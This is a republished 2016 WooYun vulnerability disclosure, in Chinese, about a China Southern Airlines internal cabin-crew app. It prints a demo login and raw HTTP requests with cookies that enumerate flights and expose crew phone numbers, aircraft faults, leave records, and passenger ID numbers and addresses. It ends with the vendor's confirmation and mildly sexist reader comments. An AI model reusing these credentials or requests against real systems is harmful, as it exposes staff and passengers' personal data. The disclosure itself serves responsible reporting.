中国南方航空股份有限公司某内部APP设计缺陷涉及大量敏感信息

2017年4月21日08:02:48评论451 views字数 226阅读0分45秒阅读模式

摘要

2016-04-20：细节已通知厂商并且等待厂商处理中
2016-04-25：厂商已经确认，细节仅向厂商公开
2016-05-05：细节向核心白帽子及相关领域专家公开
2016-05-15：细节向普通白帽子公开
2016-05-25：细节向实习白帽子公开
2016-06-09：细节向公众公开

漏洞概要关注数(29) 关注此漏洞

缺陷编号： WooYun-2016-198662

漏洞标题：中国南方航空股份有限公司某内部APP设计缺陷涉及大量敏感信息

漏洞作者：高小厨

提交时间： 2016-04-20 22:12

公开时间： 2016-06-09 09:00

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：设计不当

2人收藏

漏洞详情

披露状态：

简要描述：

你喜欢的空姐，这里都有

详细说明：

通过https://icrew.csair.com可下载南航内部使用的APP“客舱移动”

获得测试账号：100000，100000*$%

账号来源：

code 区域

GET /login/DemoUserList.action HTTP/1.1
 Host: icrew.csair.com
 Accept-Encoding: gzip
 User-Agent: 
 Connection: keep-alive
 Cookie: pass=b1VY%2Bdxzdwc%3D; user=OU2U%2F0PD9HI%3D

成功进入系统，然后各种越权：

（1）可查看任意航班的空乘人员（手机号在数据包中是没有打码的）：

code 区域

GET /mobile/flightScheduled_group.action?groupFlightDate=2016-04-24%2000:30:00.0&groupFlightNo=§5180§&groupDepPort=CAN&empId=182473 HTTP/1.1
 Host: icrew.csair.com
 Referer: https://icrew.csair.com/mobile/flightScheduled_fast.action?empId=182473
 Accept-Encoding: gzip, deflate
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Cookie: JSESSIONID=F955968ADDB987E7C38910DBAC06411A; pass=kY%2BHedsejPRL5OY6EGEgjQ%3D%3D; user=zgrQ%2BnetIDs%3D
 Accept-Language: zh-cn
 Connection: keep-alive
 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B436

（2）可查看飞机以前的故障：

（3）可查看申请假期的记录

（4）临时数据（sqllite）中还包括了一些人员的身份证号，还包含了几百名乘客的订单信息，身份证号及家庭住址等

漏洞证明：

同上

修复方案：

不仅仅验证ID，还要再次验证用户名和密码对应的ID是否匹配

版权声明：转载请注明来源高小厨@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-04-25 08:59

厂商回复：

问题找的非常仔细，感谢！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-20 22:17 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦我的宝贝 | ..)

0

你喜欢的空姐，这里都有

1# 回复此人
2016-04-20 22:22 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向，哪怕前路迷茫；抱着最大的...)

0

空姐是啥？能吃么

2# 回复此人
2016-04-20 22:36 | 小挺 ( 实习白帽子 | Rank:45 漏洞数:15 | 在读大三学生，来找工作！)

0

你喜欢的空姐，这里都有

3# 回复此人
2016-04-20 22:39 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

0

你喜欢的空姐，这里都有

4# 回复此人
2016-04-21 00:05 | 我是壮丁 ( 实习白帽子 | Rank:42 漏洞数:4 | 专业打酱油)

0

你来打卡了啊

5# 回复此人
2016-04-21 09:15 | Ton7BrEak ( 普通白帽子 | Rank:350 漏洞数:70 | ☁ 我要继续努力！)

0

@我是壮丁发现sky俩漏洞40rank~流弊~

6# 回复此人
2016-04-21 10:29 | tnt1200 ( 普通白帽子 | Rank:134 漏洞数:18 | 关注飞机安全.... @从容是我师傅)

0

你喜欢的空姐，这里都有

7# 回复此人
2016-04-21 10:33 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

0

网传MH370有2块碎片找到了。

8# 回复此人
2016-04-21 10:45 | 高小厨 ( 普通白帽子 | Rank:998 漏洞数:91 | 不会吹牛的小二不是好厨子！)

0

我补充了两张图和一个数据包，方便管理员复测使用，@浩天帮忙审核下

9# 回复此人
2016-04-21 10:57 | 糖剩七颗 ( 普通白帽子 | Rank:674 漏洞数:90 | 当几个月码农再出来冒泡！)

0

@高小厨还没上核心吗？都蓝v了

10# 回复此人
2016-04-25 09:28 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

0

你喜欢的空姐，这里都有验证码：QNMB 我也是醉了

11# 回复此人
2016-04-25 15:14 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

0

666

12# 回复此人

漏洞概要 关注数(29) 关注此漏洞

缺陷编号： WooYun-2016-198662

漏洞标题： 中国南方航空股份有限公司某内部APP设计缺陷涉及大量敏感信息

相关厂商： 中国南方航空股份有限公司

漏洞作者： 高小厨

提交时间： 2016-04-20 22:12

公开时间： 2016-06-09 09:00

漏洞类型： 设计缺陷/逻辑错误

危害等级： 高

自评Rank： 15

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 设计不当

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 高小厨@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(29) 关注此漏洞

漏洞标题：中国南方航空股份有限公司某内部APP设计缺陷涉及大量敏感信息

相关厂商：中国南方航空股份有限公司

漏洞作者：高小厨

漏洞类型：设计缺陷/逻辑错误

危害等级：高

漏洞状态：厂商已经确认

Tags标签：设计不当

版权声明：转载请注明来源高小厨@乌云

漏洞评价(共0人评价):

登陆后才能进行评分